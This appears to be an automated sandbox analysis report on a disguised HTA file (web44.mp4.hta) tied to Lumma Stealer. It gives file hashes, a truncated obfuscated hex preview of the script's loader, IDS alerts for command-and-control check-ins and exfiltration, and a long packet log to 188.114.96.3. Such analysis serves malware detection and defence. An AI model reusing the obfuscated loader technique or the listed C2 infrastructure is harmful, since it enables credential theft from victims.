                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                        File type:data
                                                        Entropy (8bit):4.504221823608571
                                                        TrID:
                                                          File name:web44.mp4.hta
                                                          File size:1'288'850 bytes
                                                          MD5:af46bc7df8441c09296666f0053fb000
                                                          SHA1:f193e30afdc9a54afb68808cd37bc240ec29618d
                                                          SHA256:d734e7c79310f56620a9243f1e3418e15fb507dec460b801eb0e14a7baa145c5
                                                          SHA512:ae1547c0658155d25da9bb186923f551c999e4b88d4501b21051d5183561457ec5c2eec35c22f7a36396306eae1a0757c1680345c89dd07c8cf4248a84e22538
                                                          SSDEEP:12288:V4PkoPkrkvt5cdkFmGQejq6YnkjYzrcdkhj3cR:GPhP8YtCdIFHeBnIeruU7i
                                                          TLSH:1455C64A6A738760C8789875EEC2CA2831767CC9598593AE96DCB43434071F83FC69FD
                                                          File Content Preview:66O75x6ek63k74Y69h6fM6eN20b67n78s73u4ak28Q78K4fi6cp43b59J76P29c7bX76Q61e72H20U75I6dQ73e45D54v3dD20G27U27e3bG66j6fY72g20j28L76l61v72K20W49r46R52I59l79U58E20V3dw20Y30p3bq49h46G52c59E79Z58v20i3cX20r78p4fn6cQ43l59D76y2eR6cu65Z6eD67r74b68G3bI20Q49D46A52f59J79y
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-01T17:11:14.941168+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449849188.114.96.3443TCP
                                                          2025-01-01T17:11:15.451455+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449849188.114.96.3443TCP
                                                          2025-01-01T17:11:15.451455+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449849188.114.96.3443TCP
                                                          2025-01-01T17:11:15.918952+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449855188.114.96.3443TCP
                                                          2025-01-01T17:11:16.388302+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449855188.114.96.3443TCP
                                                          2025-01-01T17:11:16.388302+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449855188.114.96.3443TCP
                                                          2025-01-01T17:11:17.055447+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449865188.114.96.3443TCP
                                                          2025-01-01T17:11:17.658072+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449865188.114.96.3443TCP
                                                          2025-01-01T17:11:18.138884+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449871188.114.96.3443TCP
                                                          2025-01-01T17:11:19.224758+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449881188.114.96.3443TCP
                                                          2025-01-01T17:11:20.475520+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449888188.114.96.3443TCP
                                                          2025-01-01T17:11:21.780893+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449899188.114.96.3443TCP
                                                          2025-01-01T17:11:24.796765+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449918188.114.96.3443TCP
                                                          2025-01-01T17:11:25.246850+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449918188.114.96.3443TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 1, 2025 17:10:03.110160112 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.110204935 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.110400915 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.122349024 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.122365952 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.615135908 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.617630959 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.625777006 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.625794888 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.626019955 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.641053915 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.687342882 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.991633892 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.991687059 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.991714001 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.991801023 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.991826057 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.991894960 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.991977930 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.992048025 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.992172956 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.992211103 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.992233038 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:03.992240906 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:03.992273092 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.046668053 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.100411892 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101038933 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101094007 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.101104975 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101191998 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101222038 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101253033 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.101255894 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101268053 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101363897 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.101372004 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.101440907 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.101985931 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.102174997 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.102201939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.102283955 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.102292061 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.102397919 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.112653971 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.112718105 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.112746954 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.112771034 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.112781048 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.112857103 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.117187023 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.124063015 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.124090910 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.124290943 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.124299049 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.124373913 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.129601002 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.164483070 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.164516926 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.164549112 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.164556980 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.164627075 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.170672894 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.191415071 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.191530943 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.191543102 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.191577911 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.191781044 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.191787958 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.191973925 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.192004919 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.192033052 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.192035913 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.192044020 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.192126036 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.192423105 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.192579031 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.198577881 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.198683023 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.202743053 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.202811003 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.207940102 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.208015919 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.213191032 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.213295937 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.221389055 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.221484900 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.230468035 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.230554104 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.230561018 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.237039089 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.237123013 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.237131119 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.241298914 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.241380930 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.241391897 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.241476059 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.246043921 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.246129036 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.251458883 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.251563072 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.256665945 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.256774902 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.260966063 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.261104107 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.265742064 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.266443014 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.268583059 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.268686056 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.271882057 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.271939039 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.276262999 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.276328087 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.277467012 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.277580976 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.280302048 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.280390978 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.286478996 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.287190914 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.287204981 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.287256002 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.291210890 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.291383028 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.292871952 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.292973995 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.295617104 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.295666933 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.300580978 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.300630093 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.301191092 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.301232100 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.303632021 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.303687096 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.306391954 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.306449890 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.308856964 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.308901072 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.311604023 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.311661005 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.314505100 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.314565897 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.317656994 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.317709923 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.322976112 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.323019028 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.323458910 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.323507071 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.326109886 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.326160908 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.328516960 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.328567982 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.331022024 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.331068039 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.333492041 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.333539963 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.336268902 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.336318970 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.338588953 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.338638067 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.342641115 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.342689991 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.344000101 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.344050884 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.345616102 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.345665932 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.348172903 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.348221064 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.350354910 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.350408077 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.352725983 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.352773905 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.354964972 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.355014086 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.358438015 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.358489037 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.362929106 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.362986088 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.369132996 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.369189024 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.369319916 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.369364977 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.370842934 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.370887995 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.372533083 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.372584105 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.374121904 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.374169111 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.375762939 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.375824928 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.377358913 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.377405882 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.379595995 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.379648924 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.381237984 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.381293058 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.382533073 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.382587910 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.384079933 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.384133101 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.385641098 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.385693073 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.386976957 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.387029886 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.390614986 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.390798092 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.391266108 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.391335964 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.392585993 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.392669916 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.393882990 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.393939972 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.395415068 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.395464897 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.396648884 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.396722078 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.397978067 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.398037910 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.400012970 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.400065899 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.407017946 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.407026052 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.407058001 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.407088041 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.407102108 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.407115936 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.407393932 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.407442093 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.407450914 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.411025047 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.411082029 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.411088943 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.411185980 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.411238909 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.411246061 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.412190914 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.412374020 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.412380934 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.413368940 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.413422108 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.413429022 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.414629936 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.414680004 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.414688110 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.417015076 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.417071104 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.417079926 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.417958021 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.418159008 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.418165922 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.419151068 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.419210911 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.419219971 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.421506882 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.421611071 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.421618938 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.425153017 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.425271034 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.425335884 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.425344944 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.425390959 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.452092886 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.452151060 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.452254057 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.452282906 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.452301025 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.452306986 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.452358961 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.454665899 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.454710960 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.454725027 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.454730988 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.454740047 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.454763889 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.454776049 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.456304073 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.456363916 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.456372976 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.456423044 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.456717968 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.456779003 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.457005024 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.457058907 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.459640980 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.459692001 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.470154047 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.470191002 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.470225096 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.470231056 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.470236063 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.470247984 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.470268965 CET49733443192.168.2.4188.114.96.3
                                                          Jan 1, 2025 17:10:04.470283985 CET44349733188.114.96.3192.168.2.4
                                                          Jan 1, 2025 17:10:04.470309973 CET49733443192.168.2.4188.114.96.3
